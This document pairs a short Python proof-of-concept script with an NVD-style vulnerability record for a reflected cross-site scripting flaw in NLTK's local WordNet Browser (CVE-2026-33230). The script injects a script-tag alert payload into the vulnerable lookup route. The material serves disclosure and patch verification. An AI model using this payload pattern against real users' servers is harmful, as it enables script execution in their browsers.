CVE-2026-33230

import requests # Proof of Concept for CVE-2026-33230 # Target: Local NLTK WordNet Browser server # Description: This script sends a malicious request to demonstrate the reflected XSS. target_host = "http://localhost:8000" # The payload injects a JavaScript alert into the lookup route # The vulnerability exists because the 'word' parameter in the URL is reflected unescaped. xss_payload = "<script>alert('CVE-2026-33230_POC');</script>" # Construct the malicious URL based on the vulnerable pattern 'lookup_...' malicious_url = f"{target_host}/lookup_{xss_payload}" print(f"[*] Sending request to: {malicious_url}") try: response = requests.get(malicious_url) if response.status_code == 200: print("[+] Request successful.") print("[+] If the browser executes the alert, the vulnerability is confirmed.") print(f"[+] Response Content Length: {len(response.text)}") else: print(f"[-] Unexpected status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error connecting to target: {e}")

{"cve": {"id": "CVE-2026-33230", "sourceIdentifier": "[email protected]", "published": "2026-03-20T23:16:46.680", "lastModified": "2026-03-23T19:14:50.023", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NLTK (Natural Language Toolkit) is a suite of open source Python modules, data sets, and tutorials supporting research and development in Natural Language Processing. In versions 3.9.3 and prior, `nltk.app.wordnet_app` contains a reflected cross-site scripting issue in the `lookup_...` route. A crafted `lookup_<payload>` URL can inject arbitrary HTML/JavaScript into the response page because attacker-controlled `word` data is reflected into HTML without escaping. This impacts users running the local WordNet Browser server and can lead to script execution in the browser origin of that application. Commit 1c3f799607eeb088cab2491dcf806ae83c29ad8f fixes the issue."}, {"lang": "es", "value": "NLTK (Natural Language Toolkit) es un conjunto de módulos Python de código abierto, conjuntos de datos y tutoriales que apoyan la investigación y el desarrollo en Procesamiento del Lenguaje Natural. En las versiones 3.9.3 y anteriores, `nltk.app.wordnet_app` contiene una vulnerabilidad de cross-site scripting reflejado en la ruta 'lookup_...'. Una URL 'lookup_' manipulada puede inyectar HTML/JavaScript arbitrario en la página de respuesta porque los datos 'word' controlados por el atacante se reflejan en HTML sin escapar. Esto afecta a los usuarios que ejecutan el servidor local de WordNet Browser y puede conducir a la ejecución de scripts en el origen del navegador de esa aplicación. El commit 1c3f799607eeb088cab2491dcf806ae83c29ad8f corrige la vulnerabilidad."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nltk:nltk:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.9.3", "matchCriteriaId": "E3C35863-7D82-4EEF-BDE8-E94C559CF4FB"}]}]}], "references": [{"url": "https://github.com/nltk/nltk/commit/1c3f799607eeb088cab2491dcf806ae83c29ad8f", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/nltk/nltk/commit/40d0bc1d484a3458d6a63ecb5ba4957ab16ba14e", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/nltk/nltk/security/advisories/GHSA-gfwx-w7gr-fvh7", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}